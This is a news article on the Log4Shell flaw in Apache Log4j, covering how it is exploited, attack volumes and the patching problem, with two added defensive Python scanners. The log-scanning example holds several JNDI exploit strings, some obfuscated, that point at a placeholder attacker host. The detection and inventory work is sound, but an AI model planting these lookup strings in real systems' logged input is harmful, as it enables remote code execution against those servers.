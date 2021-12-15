by Federico Cella and Alessio Lana

The Italian Cybersecurity Agency calls the situation “particularly serious”, and many companies do not know how to protect themselves

Since we first wrote about Log4Shell, the vulnerability in the Log4j library (tracked as CVE-2021-44228), more than 800,000 attack attempts have exploited this weakness in an open-source component that underpins many websites and network services in general. Distributed free of charge by the Apache Software Foundation, Log4j is a logging library: it lets developers record what their software is doing so that they can intervene when something goes wrong. In a word, it is everywhere.

Security experts are not mincing their words. The Italian Cybersecurity Agency speaks of “a vast and diversified attack surface across the entire network” and calls the situation “particularly serious”, while phrases such as “worst vulnerability ever recorded” and “a design error of catastrophic proportions” follow one another relentlessly. Almost everyone is affected: from Apple to Amazon via LinkedIn, Cloudflare, IBM, Twitter and Tesla, the list of companies that use or have used Log4j keeps growing.

Discovered in late November by a researcher at Alibaba, the Chinese e-commerce and cloud giant, the flaw is simple to exploit and extremely contagious. The weakness lies in how Log4j processes the text it is asked to log: if that text contains a specially crafted lookup string, the library resolves it by contacting the server named in the string, which can be one the attacker controls, and can be made to load and run code fetched from there. The attacker therefore needs no access to the server at all; it is enough to get the string into anything the application logs, such as a username, a chat message or a web request header. Criminals can use this to plant malware, steal data, or take control of the whole system.

The first major attack targeted Minecraft, or rather Minecraft Java Edition (here we explain how to fix the problem). Players began pasting the exploit string into the in-game chat, which the server writes to its logs, in an attempt to trigger the flaw. Then it was Twitter’s turn, with some users setting the string as their display name. Others renamed their iPhone to it. These are so many probes, showing how many people are working out how to get through a door that looks more and more like a gate. The growth is exponential: 40,000 attack attempts were recorded on 11 December, 200,000 on 12 December and 840,000 on 13 December. According to Akamai, the rate has now reached 250,000 an hour.
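To make the probes described above concrete, here is an added example of detection logic that scans log lines for Log4Shell lookup strings. It is written for this page and is not code from the original article or from any of the organisations mentioned. A naive search for the literal text `${jndi:` misses the obfuscated variants attackers started using within days (nested `${lower:…}`, `${upper:…}` and `${…:-x}` default-value lookups that spell out the word letter by letter), so the scanner first collapses those lookups the way Log4j itself would, then matches. The log lines are constructed for the example and `attacker.example` is a placeholder hostname.

```python
import re

# Constructed sample log lines for this example (not real captured traffic):
# a Minecraft chat message, an HTTP access-log entry carrying the probe in the
# User-Agent, two obfuscated variants, and one benign line.
SAMPLE_LOG_LINES = [
    '[12:01:03] [Server thread/INFO]: <player1> ${jndi:ldap://attacker.example:1389/a}',
    '198.51.100.7 - - [13/Dec/2021:10:15:02 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    'login attempt user="${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example:1099/Obj}"',
    'display_name=${${env:NaN:-j}ndi:${upper:d}ns://attacker.example/name}',
    '[12:01:04] [Server thread/INFO]: <player2> hello, anyone selling diamonds?',
]

# An innermost ${...} lookup: one that contains no further '${' or '}'.
INNERMOST = re.compile(r'\$\{([^${}]*)\}')

# The lookup we are hunting for, matched only after de-obfuscation.
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:',
                  re.IGNORECASE)


def _resolve(body):
    """Statically resolve one innermost lookup for the handful of forms attackers
    use to hide the letters 'jndi'. Unknown lookups (env:, sys:, date:, ...) cannot
    be evaluated offline, so their text is kept as-is."""
    if ':-' in body:                      # ${anything:-default} -> default
        return body.split(':-', 1)[1]
    kind, sep, arg = body.partition(':')
    if sep and kind.lower() == 'lower':   # ${lower:J} -> j
        return arg.lower()
    if sep and kind.lower() == 'upper':   # ${upper:d} -> D
        return arg.upper()
    return body


def normalize(text, max_rounds=20):
    """Collapse nested lookups from the inside out, leaving ${jndi:...} itself in place."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            if re.match(r'\s*jndi\s*:', m.group(1), re.IGNORECASE):
                return m.group(0)         # keep the real lookup for the detector
            changed = True
            return _resolve(m.group(1))

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def find_log4shell_probes(lines):
    """Return one finding per line containing a JNDI lookup, with the de-obfuscated payload."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        norm = normalize(raw)
        m = JNDI.search(norm)
        if not m:
            continue
        end = norm.find('}', m.start())
        payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        findings.append({
            'line': number,
            'scheme': m.group(1).lower(),
            'payload': payload,
            'obfuscated': norm != raw,
            'raw': raw,
        })
    return findings


if __name__ == '__main__':
    for hit in find_log4shell_probes(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['scheme']} lookup {hit['payload']!r} "
              f"(obfuscated={hit['obfuscated']})")
```

The normaliser only handles the obfuscation tricks that rely on lookups resolvable without a running JVM; a probe that hides the scheme behind an `${env:…}` or `${sys:…}` lookup with no default value will still surface as a `jndi:` prefix but with an unresolved scheme, so in production the alert should fire on the bare `jndi:` prefix as well and let an analyst triage.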

Making the flaw public allowed it to be addressed more quickly, but it also set the cybercriminals in motion. Its scope cannot be measured at the moment: Apache itself says Log4j is embedded in so much software that its presence cannot be traced. The only certainty this emergency confirms is how shaky the structure of the global network is. It has been built up in layers over the years without any single design, resting part of its workings on many small pieces of software, some of them years old and developed so that they work (and they do) without particular attention to security. That concern is now increasingly fundamental, but years ago it was not among the priorities. In cases like this one speaks of giants with feet of clay.

In the last few days a kind of global game of cops and robbers has begun. On one side are the criminals trying to exploit the flaw; on the other, companies scrambling to protect themselves. But it is not that easy. The larger and better-equipped companies are already rolling out patches, fixes that should at least stem the damage (Apache has published corrected releases of the library, first 2.15.0 and then 2.16.0), and the Dutch security agency NCSC-NL has published a list of software known to be affected.

Thousands of other, smaller businesses, however, are unable to intervene. “Because of the way this library is used by the most diverse software, it is not easy for a user to understand whether the software he is using uses this library or not,” says Nicholas Luedtke, Principal Analyst at Mandiant. “If you can’t get rid of this doubt quickly, then it becomes really difficult to apply mitigations.” Meanwhile the race against time continues, and the effects of the attacks will only become clear in the coming days.
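The inventory problem the Mandiant quote describes is what a practitioner has to solve first: find every copy of `log4j-core`, including the ones buried inside application archives, and decide which of them are exploitable. The following is an added example written for this page, not a tool from Mandiant, Apache or the article; it looks inside `.jar`/`.war`/`.ear` files, descends into nested archives (the "fat jar" layout that hides most copies), reads the Maven `pom.properties` to get the version, and checks whether the `JndiLookup.class` file, the class that implements the dangerous lookup, is still present. It therefore distinguishes an old jar that was mitigated by deleting that class from one that was not. The fixture archives are constructed in a temporary directory with placeholder bytes instead of real bytecode, and the `FIXED_VERSION` threshold of 2.16.0 is an assumption reflecting the releases available at the time of the article; adjust it as Apache publishes further fixes.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Markers inside a log4j-core jar: the class implementing the JNDI lookup, and the
# Maven metadata file that records the library version.
JNDI_LOOKUP_CLASS = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
POM_PROPERTIES = 'META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties'
# Assumption for this example: anything older than this release needs updating.
FIXED_VERSION = (2, 16, 0)
ARCHIVE_SUFFIXES = ('.jar', '.war', '.ear', '.zip')


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); tolerates suffixes such as '2.0-beta9' -> (2, 0)."""
    parts = []
    for piece in text.split('.'):
        m = re.match(r'\d+', piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def inspect_archive(data, label, findings, depth=0, max_depth=3):
    """Record log4j-core copies found in an archive, descending into nested archives
    so copies bundled inside an application are not missed."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode('utf-8', 'replace').splitlines():
            if line.startswith('version='):
                version = line.split('=', 1)[1].strip()
    has_jndi = JNDI_LOOKUP_CLASS in names
    if version is not None or has_jndi:
        # Exploitable only if the lookup class is still there and the version is old or unknown.
        vulnerable = has_jndi and (version is None or parse_version(version) < FIXED_VERSION)
        findings.append({'path': label, 'version': version,
                         'jndi_lookup_present': has_jndi, 'vulnerable': vulnerable})
    if depth < max_depth:
        for inner in sorted(names):
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(inner), f'{label}!{inner}', findings, depth + 1, max_depth)


def scan_directory(root):
    """Walk a directory tree and inspect every archive found in it."""
    findings = []
    for path in sorted(Path(root).rglob('*')):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            inspect_archive(path.read_bytes(), str(path), findings)
    return findings


def _jar_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def _pom(version):
    return f'version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n'


def build_sample_tree(root):
    """Write constructed fixture jars (placeholder bytes, not real bytecode)."""
    root = Path(root)
    (root / 'lib').mkdir(parents=True, exist_ok=True)
    fake_class = b'\xca\xfe\xba\xbe'
    (root / 'lib' / 'log4j-core-2.14.1.jar').write_bytes(
        _jar_bytes({POM_PROPERTIES: _pom('2.14.1'), JNDI_LOOKUP_CLASS: fake_class}))
    (root / 'lib' / 'log4j-core-2.16.0.jar').write_bytes(
        _jar_bytes({POM_PROPERTIES: _pom('2.16.0'), JNDI_LOOKUP_CLASS: fake_class}))
    # Old version mitigated by deleting JndiLookup.class from the jar.
    (root / 'lib' / 'log4j-core-2.14.1-stripped.jar').write_bytes(
        _jar_bytes({POM_PROPERTIES: _pom('2.14.1')}))
    # Fat application jar with a vulnerable copy nested inside.
    nested = _jar_bytes({POM_PROPERTIES: _pom('2.13.3'), JNDI_LOOKUP_CLASS: fake_class})
    (root / 'app.jar').write_bytes(
        _jar_bytes({'BOOT-INF/lib/log4j-core-2.13.3.jar': nested,
                    'com/example/App.class': fake_class}))


def run_demo():
    """Build the fixture in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_directory(tmp)


if __name__ == '__main__':
    for finding in run_demo():
        status = 'VULNERABLE' if finding['vulnerable'] else 'ok'
        print(f"{status:10} {finding['version'] or 'unknown':8} "
              f"jndi_lookup={finding['jndi_lookup_present']} {finding['path']}")
```

Running `scan_directory('/')` on a real host (with the demo fixture replaced by the filesystem) is a reasonable first inventory pass, but it only sees archives on disk: applications that shade Log4j into their own package names, that load it from a container image layer not mounted on the host, or that ship it as an exploded class directory need other checks, which is exactly why the quote above calls the problem hard.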